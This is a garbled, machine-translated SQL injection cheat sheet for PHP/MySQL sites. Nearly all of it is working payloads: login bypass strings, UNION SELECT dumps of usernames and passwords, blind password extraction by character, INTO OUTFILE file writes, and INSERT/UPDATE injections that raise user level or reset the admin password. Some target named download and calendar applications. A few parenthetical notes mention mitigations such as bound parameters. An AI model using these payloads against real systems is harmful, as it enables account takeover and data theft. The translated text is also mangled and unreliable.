PHP injection

xiaoxiao2021-03-06  40

PHP injection

'or 1 = 1' or '1 = 1' / * '% 23' and password = 'mypass id = -1 union select 1, 1, 1 id = -1 Union Select Char (97), CHAR (97), Char (97) ID = 1 Union Select 1, 1, 1 from members ID = 1 Union SELECT 1, 1, 1 from admin ID = 1 Union Select 1, 1, 1 from user userid = 1 and password = mypass userid = 1 And MID (Password, 3, 1) = char (112) Userid = 1 and MID (Password, 4, 1) = char (97) And ORD (MID (Password, 3, 1))> 111 (the ORD function is very useful here: it returns an integer) 'and length (password) =' 6 (tests the password length) 'and left (password, 1) =' m 'and left (password, 2) =' my ..................... ......... IPT 1, USERNAME, Password from user / * 'union select 1, username, password from user / * =' Union Select 1, username, password from user / * (can be 1 or = directly And) 99999 'Union Select 1, Username, Password from user / *' inTo outfile 'c: /file.txt (exports the result to a file; INTO OUTFILE and INTO DUMPFILE succeed only when the application's database account holds the MySQL FILE privilege, so withholding that privilege and restricting secure_file_priv blocks these file writes) =' or 1 = 1 INTO OUTFILE 'C: /FILE.TXT 1' Union Select 1, Username, Password from User Into Outfile 'C: /User.txt SELECT Password from Admin SERE Login =' John 'Into Dumpfile' /Path/to/site/file.txt 'id =' union Select 1, username, Password from User INTO OUTFILE ID = -1 Union Select 1, Database (), Version () (flexible application query) Common test statements (conditions that are always true): select * from table where 1 = 1 Select * from table where 'uuu' = 'uuu' selection * from table where 1 <> 2 Select * From Table WHERE 3> 2 Select * from table where 2 <3 Select * from table where 1 select * from table where 1

1 Select * from table where ille1 From table where 2 between 1 and 3 select * from table where 'b' between 'a' and 'c' Select * from table where 2 in (0, 1, 2) SELECT * from Table WHERE Case WHEN 1> 0 THEN 1 END, for example: Night Cat Download System 1.0 version ID = 1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from YMDown_USER UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 ID = 10000 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 and groupid = 1 Union Select 1, Username, 1, Password, 1 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 (replace, looking for a password) Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 and ORD (MID (Password, 1, 1)) = 49 ( Verify the first password) Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 and ORD (MID (PASSWORD, 2, 1)) = 50 (second) Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1 and ORD (MID (Password, 3, 1)) = 51 ..............................................................

For example 2: Gray Track Transform ID Test (Meteor) Union% 20 (Select% 20allowsMilies, public, userid, '0000-0-0', user (), version ()% 20FROM% 20calendar_events% 20where% 20EventID% 20 = % 2013)% 20RDER% 20BY% 20EventDate Union% 20 (Select% 20allowsmilies, public, userid, '0000-0-0', pass (), version ()% 20FROM% 20Calendar_Events% 20where% 20eventid% 20 =% 2010) % 20ORDER% 20by% 20eventDate constructor: Select Allowsmilies, Public, Userid, EventDate, Event, Subject from calendar_events where eventid = 1 Union (SELECT 1, 1, 1, 1, 1, 1 from user where userid = 1) Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, UserId = 1) Union% 20 (SELECT% 201, 0, 2 , '1999-01-01', 'a', password% 20FROM% 20User% 20where% 20Userid% 20 =% 205)% 20ORDER% 20BY% 20EventDate Union% 20 (select% 201, 0, 12695, '1999-01 -01 ',' a ', password% 20FROM% 20User% 20where% 20Userid = 13465)% 20RDER% 20BY% 20eventdate Union% 20 (Select% 201, 0, 12695,' 1999-01-01 ',' A ', Userid% 20FROM% 20User% 20where% 20USERNAME = 'sandflee')% 20ORDER% 20BY% 20eventdat e (SAS ID) (Select a from table_name where a = 10 and b = 1 Order by a limit 10) Select * from article where articleid = '$ ID' Union Select * from ... (field and database in the same case , Can be submitted directly) Select * from article where articleid = '$ ID' Union SELECT 1, 1, 1, 1, 1, 1, 1 from ... (in different cases)

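Special technique: in forms, search boxes and similar inputs, enter: "___" "" .__ ""%% 'Order by ArticleID / *%' Order by ArticleID # __ 'Order by ArticleID / * __' Order by ArticleID # (These inputs rely on the LIKE wildcards % and _ and on quote and comment characters reaching the query unescaped; binding the search term as a parameter and escaping the wildcards prevents this.)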

$ comMMAND = "DIR C: /"; System ($ command); select * from article where articleid = '$ ID' SELECT * from article where article = $ ID 1 'and 1 = 2 Union Select * from user where userid = 1 / * the statement becomes (Select * from article where articleid = '1' and 1 = 2 Union Select * from user where userid = 1 / * ') 1 and 1 = 2 Union Select * from user where userid = 1 (Both queries are injectable because $ID is interpolated into the SQL text; binding it as a prepared-statement parameter, or casting it to an integer for the unquoted form, keeps the input from changing the statement.) Statement form: create a database and insert: create database...`. userid` int (11) Not null auto_increment, `Username` Varchar (20) Not null default ',` Password` VARCHAR (20) NOT NULL Default ', Primary Key (`Userid`) Insert Into` User` VALUES (1,' Swap ',' mypass);

Insert, for a registered user: INSERT INTO `USER` (UserId, Userlevel) Values ​​('', '$ usrname",' $ password ',' $ homepage ',' 1 '); "Insert Into MEMBRES (Login, Password, Nom, Email, Userlevel) Values ​​('$ login', '$ Pass', '$ NOM', '$ Email', '1') "; Insert Into Membres (Login, Password, NOM, Email, userlevel) Values ​​('', ',' ',' ',' 3 ') #', '1') "INSERT INTO MEMBRES SET login = '$ login', password = '$ pass', NOM = '$ NOM', Email = '$ Email'; Insert Into Membres Set Login = ', Password =' ​​', NOM =', Userlevel = '3', Email = '' "INTO MEMBRES VALUES ('$ ID ',' $ login ',' $ Pass', '$ NOM', '$ Email', '1')

Update user set password = '$ password', homepage = '$ homepage' where id = '$ ID' update user set password = 'md5 (mypass)' where username = 'admin' #) ', homepage =' $ homepage ' WHERE ID = '$ ID' "Update MEMBRES SET Password = '$ Pass', NOM = '$ NOM', Email = '$ Email' Where ID = '$ ID'"; UPDATE MEMBRES SET Password = '[Pass]' , NOM = ', userlevel =' 3 ', email =' 'where id =' [id] '"Update News set votes = votes 1, score = score $ note where id/ =' $ ID '"; Commonly used functions: Database () user () system_user () session_user () current_user () For example: Update Article Set title = $ title where articles = 1 With the corresponding function substituted: update article set title = Database () where id = 1 # writes the current database name into the title field Update Article Set = USER () Where id = 1 # writes the current MySQL user name into the title field Update Article Set title = system_user () where id = 1 # writes the current MySQL user name into the title field Update Article Set Title = session_user () where id = 1 # writes the current MySQL user name into the title field Update Article Set title = current_user () where id = 1 # writes the user name the current session was authenticated as into the title field (This is possible because $title is placed in the statement unquoted and unbound; passing it as a bound parameter makes the database treat it as a string value rather than as a function call.)
